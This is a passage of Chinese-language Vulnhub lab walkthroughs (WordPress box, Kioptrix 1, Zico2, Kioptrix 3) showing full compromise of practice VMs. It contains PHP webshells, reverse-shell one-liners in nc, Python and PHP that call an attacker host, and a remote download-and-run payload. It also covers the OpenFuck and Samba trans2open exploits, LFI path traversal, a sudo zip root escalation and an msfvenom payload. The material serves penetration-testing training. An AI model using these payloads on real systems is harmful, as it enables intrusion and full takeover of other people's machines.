<code>http://172.20.10.8/backup_wordpress/wp-login.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2)WordPress獲取shell的方法有多種，進入<code>Appearance  -> Editor</code>，點擊右邊的<code>Theme Header</code>，在編輯器裏面插入一句話命令執行小馬<code><?php system($_GET['cmd']); ?></code>保存。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)在Burpsuit中經過cmd參數執行命令，訪問<code>172.20.10.8/backup_wordpress/?cmd=id;ls</code> 成功執行id和ls命令：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)經過nc反彈shell 執行命令<code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.5 4444 >/tmp/f</code>，需將命令進行url編碼，而後在Burpsuit中發送：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5)Windows攻擊機開啓nc接收反彈shell成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)爲查找和傳送文件方便，寫入菜刀馬<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀鏈接成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9917' class='md-header-anchor '></a>提高權限</h2><ul><li>0x5 查找用戶文件</li></ul><p>(1)查找每一個用戶文件，和瀏覽各目錄文件，發現位於<code>/usr/local/bin/cleanup</code>文件，其權限是777，查看內容爲：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>#!/bin/sh</code></p><p><code>rm -rf /var/log/apache2/*    # Clean those damn logs!!</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這是一段清理Apache日誌的腳本，須要root權限運行。</p><p>查看cleanup文件的權限爲777，能夠隨意修改和執行，能夠將文件內容改爲一個反彈shell。</p><p>(2)在菜刀中直接修改cleanup文件爲反彈shell命令：因在<code>/usr/local/lib/python2.7/</code>目錄下安裝有Python2.7，因此可使用Python反彈shell</p><p><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.5",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)Windows開啓NC，等待接收反彈shell，root權限：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)查看flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9950' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n9951' class='md-header-anchor '></a>突破點和坑</h3><p>1.沒有突破點的時候，就嘗試暴破已知用戶名的密碼，字典採用國外密碼字段較好。</p><p>2.Linux反彈shell有多種姿式，bash、nc、php、Python等都須要嘗試。</p><p>3.需熟悉WordPress後臺getshell姿式。</p><p>4.靶機做者提示有多種方法，確定還有其餘方法，本次滲透使用了暴破ssh用戶和WordPress滲透兩種方法。</p><p> </p><h1><a name='header-n9962' class='md-header-anchor '></a>第十三節 Kioptrix 1</h1><hr /><p>title: Vulnhub滲透測試練習-Kioptrix 1
date: 2018-05-07 15:28:05
categories: 筆記</p><h2><a name='header-n9965' class='md-header-anchor '></a>做者：Ukonw</h2><h2><a name='header-n9969' class='md-header-anchor '></a>信息收集</h2><p>經過<code>netdiscover</code>發現目標主機IP地址。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# netdiscover </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts         </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                                                                             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> _____________________________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> -----------------------------------------------------------------------------</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.1    ac:c1:ee:31:3f:25      1      60  Xiaomi Communications Co L</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.33   44:03:2c:68:d8:0f      1      60  Intel Corporate           </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.54   00:0c:29:7c:3a:16      1      60  VMware, Inc.                     </span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>從掃描信息的得的目標主機的IP地址爲<code>192.168.43.54</code></p><p>nmap 掃描IP的端口信息<code>nmap -A 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS 192.168.43.54
 
Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
 
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.43.54
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds
</pre><p><code>443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)</code></p><p>443端口的服務<code>mod_ssl/2.8.4 OpenSSL/0.9.6b</code></p><p>經過<code>searchsploit mod_ssl</code>查詢相關漏洞</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
 
</pre><p>這裏能夠利用第4個漏洞的exp腳本進行攻擊，<code>exploit-db</code>下載相關exp。</p><h2><a name='header-n9987' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n9988' class='md-header-anchor '></a>OpenFuck漏洞利用</h3><p>這是一個遠程溢出的漏洞，下載的exp比較久遠須要作一些修改。</p><ul><li>編譯須要用的<code>libssl-dev</code>庫，且版本爲<code>apt-get install libssl1.0-dev</code>
在exp中加入頭文件<code><openssl/rc4.h></code>和<code><openssl/md5.h></code>
    替換exp中的<code>wget</code>後的url爲<code>http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</code>
    第961行,修改成<code>const unsigned char * p，* end;</code></li></ul><p>而後編譯</p><pre class="md-fences mock-cm md-end-block" lang="">gcc -o OpenFuck 764.c -lcrypto
</pre><p>運行腳本<code>./OpenFuck</code>選擇相應我係統版本</p><p>這裏選擇 0x6b</p><p>執行相關的命令<code>./OpenFuck 0x6b 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54
 
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
 
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--04:04:37--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
 
    0K ...                                                   100% @   3.74 MB/s
 
04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
</pre><h3><a name='header-n10008' class='md-header-anchor '></a>Samba漏洞利用</h3><p>實驗環境是存在一個samba漏洞的，</p><p>這裏用到<code>enum4linux</code>其利用SMB協議枚舉Windows系統和SAMBA服務，以此來得到目標系統大量的重要信息，其枚舉結果可能包含目標系統的用戶賬號、組賬號、共享目錄、密碼策略等機密重要信息。</p><p>但我本地環境沒有檢測到samba的版本</p><p>該漏洞爲<code>Samba trans2open溢出（Linux x86）</code>在Samba 2.2.0到2.2.8版本中發現的緩衝區溢出.</p><p>一樣能夠在<code>searchsploit</code>查到</p><p>這裏直接用msf環境進行實驗。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf exploit(linux/samba/trans2open) > show options 
 
Module options (exploit/linux/samba/trans2open):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.43.54   yes       The target address
   RPORT  139              yes       The target port (TCP)
 
 
Payload options (linux/x86/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.54   no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
 
msf exploit(linux/samba/trans2open) > exploit
 
[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400
 
id
uid=0(root) gid=0(root) groups=99(nobody)
</pre><h2><a name='header-n10023' class='md-header-anchor '></a>總結</h2><p>雖說這個實驗環境比較老，一些漏洞可能在現實的實戰中是不多存在的。可是在這個漏洞利用的過程當中能夠學到一些<code>kali linux</code>的工具的利用和一些實戰的思路。</p><p> </p><h1><a name='header-n10028' class='md-header-anchor '></a>第十四節  Zico2</h1><hr /><p>title: Vulnhub滲透測試練習 - Zico2
date: 2018-05-05 22:30:35
categories: 筆記</p><h2><a name='header-n10031' class='md-header-anchor '></a>做者：Ukonw</h2><h2><a name='header-n10035' class='md-header-anchor '></a>vulnhub滲透環境</h2><h3><a name='header-n10036' class='md-header-anchor '></a>靶機地址</h3><p><a href='https://www.vulnhub.com/entry/zico2-1,210' target='_blank' class='url'>https://www.vulnhub.com/entry/zico2-1,210</a>/</p><h3><a name='header-n10039' class='md-header-anchor '></a>練習環境</h3><ul><li>Kali Linux 
VirtualBox</li></ul><h2><a name='header-n10045' class='md-header-anchor '></a>信息收集</h2><p>在信息收集以前須要獲取到靶機的IP地址，我靶機在VirtualBox下是<code>Host-Only</code>網絡模式，而靶機是沒法直接進入系統看到IP地址的。</p><p>這裏用到一個kali linux下的一個工具<code>netdiscover</code>基於ARP的網絡掃描工具。</p><p>直接執行命令<code>netdiscover</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505223944.png' alt='' referrerPolicy='no-referrer' /></p><p>這裏咱們獲取到兩個IP地址，測試發現正確的是<code>192.168.56.102</code></p><p>接下來用<code>nmap</code>掃描端口信息</p><p><code>nmap -A 192.168.56.102</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505224409.png' alt='' referrerPolicy='no-referrer' /></p><p>獲得80端口上運行着一個Web服務器。</p><p>訪問該Web服務，在這個時候咱們能夠用常見的掃描工具對網站進行掃描</p><h2><a name='header-n10066' class='md-header-anchor '></a>漏洞利用</h2><p>這裏我簡單對頁面進行瀏覽，發現了一個文件包含漏洞。</p><pre class="md-fences mock-cm md-end-block" lang="">view.php?page=tools.html
</pre><p>嘗試包含<code>../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_1.png' alt='' referrerPolicy='no-referrer' /></p><p>成功包含，解下來就嘗試掃描目錄，由於校園網的緣由，只能用<code>Host-Only</code>網絡模式進行測試，因此一切測試過程都在<code>Kali</code>下進行</p><p>這裏嘗試去掃描網站的目錄，用到<code>kali</code>下的<code>dirb</code>專門用於爆破目錄的工具。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_2.png' alt='' referrerPolicy='no-referrer' /></p><p>獲得一個<code>dbadmin</code>的目錄</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_3.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_4.png' alt='' referrerPolicy='no-referrer' /></p><p>這裏用到的是一個叫<code>phpLiteAdmin</code>服務器應用，版本號爲<code>v1.9.3</code></p><p>嘗試找找這個版本的歷史漏洞，這個服務是存在一個遠程PHP代碼注入漏洞的。</p><p>這裏能夠經過搜索引擎搜索相關漏洞詳情也能夠用<code>kali</code>下的<code>Searchsploit</code>一個用於Exploit-DB的命令行搜索工具。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_5.png' alt='' referrerPolicy='no-referrer' /></p><p>這樣們就能夠看到漏洞詳情，這裏咱們能夠看到利用這個遠程PHP代碼注入漏洞須要登陸的。</p><p>因此嘗試默認密碼<code>admin</code>，發現能夠直接登陸進去。</p><p>從<code>exploit-db</code>上的資料能夠看出，咱們須要建立一個數據庫，寫入一個shell。</p><p>這裏能夠用nc監聽端口來反彈shell，也能夠用msf生成php目錄進行監聽。</p><p>按照<code>exploit-db</code>所說的創建數據庫。這裏直接建立一個後綴名爲<code>.php</code>的數據庫<code>shell</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_6.png' alt='' referrerPolicy='no-referrer' /></p><p>並添加表信息</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_7.png' alt='' referrerPolicy='no-referrer' /></p><p>這裏在本地的<code>/var/www/html</code>目錄下建立txt文件</p><pre class="md-fences mock-cm md-end-block" lang=""><?php $sock=fsockopen("192.168.56.101",2333);exec("/bin/sh -i <&3 >&3 2>&3");?>
</pre><p>而後啓動apache web服務器</p><pre class="md-fences mock-cm md-end-block" lang="">service apache2 start
</pre><p>而後返回到數據庫中添加字段名，類型爲<code>TEXT</code>,寫入PHP代碼來下載執行shell</p><pre class="md-fences mock-cm md-end-block" lang=""><?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_8.png' alt='' referrerPolicy='no-referrer' /></p><p>須要讓目標下載執行這串惡意代碼，須要一個HTTP請求。</p><p>這裏咱們就能夠利用到以前發現的本地文件包含的漏洞了。</p><p>咱們能夠在數據庫中發現咱們惡意建立的數據庫的路徑</p><pre class="md-fences mock-cm md-end-block" lang="">/usr/databases/shell.php
</pre><p>先用nc監聽咱們以前設置的端口<code>2333</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_9.png' alt='' referrerPolicy='no-referrer' /></p><p>這裏咱們就能夠反彈一個shell了。</p><h2><a name='header-n10134' class='md-header-anchor '></a>權限提高</h2><p>在反彈了shell後，對目錄進行檢查發現了</p><p>/home/zico中有一個<code>wordpress</code>目錄，是一個常見的CMS</p><p>進入查看wp-config.php文件。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_10.png' alt='' referrerPolicy='no-referrer' /></p><p>發現了用戶zico的登陸憑證，咱們能夠用<code>ssh</code>來鏈接。</p><pre class="md-fences mock-cm md-end-block" lang="">ssh zico@192.168.56.102
</pre><p>利用<code>sudo -l</code>查看目前用戶可執行與沒法執行的指令；</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_11.png' alt='' referrerPolicy='no-referrer' /></p><p>這裏代表當前用戶<code>zico</code>能夠利用root權限無密碼執行<code>tar</code>和<code>zip</code>命令</p><p>這裏能夠利用<code>touch exploit</code>建立一個隨機文件，並用<code>zip</code>命令進行壓縮</p><pre class="md-fences mock-cm md-end-block" lang="">sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
</pre><ul><li>sudo 用管理員權限執行
-T 檢查文件的完整性。這個參數可讓他執行下一個參數 --unzip-command，在這個參數中寫入一個python的交互shell</li></ul><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_12.png' alt='' referrerPolicy='no-referrer' /></p><p>由此的到<code>root</code>權限，接下來就能夠進入<code>/root</code>目錄了</p><p><code>cat /root/flag.txt</code>獲得flag。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_13.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10169' class='md-header-anchor '></a>總結</h2><ul><li>vulnhub裏面有不少不一樣的環境提供滲透，第一次完成一次完整的滲透過程，學到了不少東西。
在文章的開頭用到了<code>kali linux</code>下的一個工具<code>netdiscover</code>基於ARP的網絡掃描工具。記得在一個師傅的面試經驗介紹中，他被面試官問到爲何要用arp去探測內網主機，他回答的是至關隱蔽，探測的信息更準確。主要是由於傳統探測遠程主機是否存活的方法是經過ICMP協議中的回顯應答報文來探測(ping)。不少主機爲了不被掃描器探測，經過防火牆將ICMP包屏蔽，從而達到在網絡中隱藏的目的。
    在文章中用到了兩種語言的交互shell。分別是php和python，這裏參考老外的博客<a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Reverse Shell Cheat Sheet</a>
    對於我我的在提權實戰經驗方面是十分少的，在此次練習中學到了能夠利用<code>touch exploit</code>建立一個隨機文件，並用<code>zip</code>命令進行壓縮，因而可知仍是本身的實戰經驗太少了。
    最後感概下，英文的重要性。國外不少大牛的博客都是很豐富的，而對於一個英語四級425飄過的菜雞，我也是很無奈的。只能靠百度翻譯了。</li></ul><p> </p><h1><a name='header-n10180' class='md-header-anchor '></a>第十五節 Kioptrix 3</h1><hr /><p>title: Vulnhub滲透測試練習-Kioptrix 3
date: 2018-05-08 20:01:26
categories: 筆記</p><h2><a name='header-n10183' class='md-header-anchor '></a>做者：Ukonw</h2><h2><a name='header-n10187' class='md-header-anchor '></a>信息收集</h2><p>一樣用<code>netdiscover</code>發現目標主機。</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 
 
 Currently scanning: 192.168.194.0/16   |   Screen View: Unique Hosts          
                                                                                
 13 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 780              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      6     360  Xiaomi Communications Co Ltd
 192.168.43.33   44:03:2c:68:d8:0f      2     120  Intel Corporate             
 192.168.43.58   00:0c:29:b2:76:40      4     240  VMware, Inc.                
 192.168.43.158  00:0c:29:38:2d:6f      1      60  VMware, Inc. 
</pre><p>目標IP爲<code>192.168.43.158</code>。</p><p>用nmap掃描目標主機端口信息。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
 
</pre><p>由掃描信息能夠獲得</p><ul><li>22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    OS details: Linux 2.6.9 - 2.6.33</li></ul><p> </p><p>80端口能夠看出cms爲<code>Lotus CMS</code>。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_4.png' alt='' referrerPolicy='no-referrer' /></p><p>用<code>dirb</code>掃描一下網站目錄。也能夠用御劍掃描目錄。發現存在<code>phpdamin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_5.png' alt='' referrerPolicy='no-referrer' /></p><p>cms後臺<code>http://192.168.43.158/index.php?system=Admin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10218' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n10220' class='md-header-anchor '></a>文件包含&後臺上傳</h3><p>訪問80端口上的WEB服務。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_1.png' alt='' referrerPolicy='no-referrer' /></p><p>發現url中有點問題</p><p><code>http://192.168.43.158/index.php?system=Blog</code></p><p>嘗試<code>system=../../../../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_2.png' alt='' referrerPolicy='no-referrer' /></p><p>好像不行，嘗試<code>%00.</code>截斷，發現能夠讀到<code>/etc/passwd</code></p><p><code>http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_3.png' alt='' referrerPolicy='no-referrer' /></p><p>這裏能夠結合後面SQLmap跑出來的後臺密碼獲得了一個shell。</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
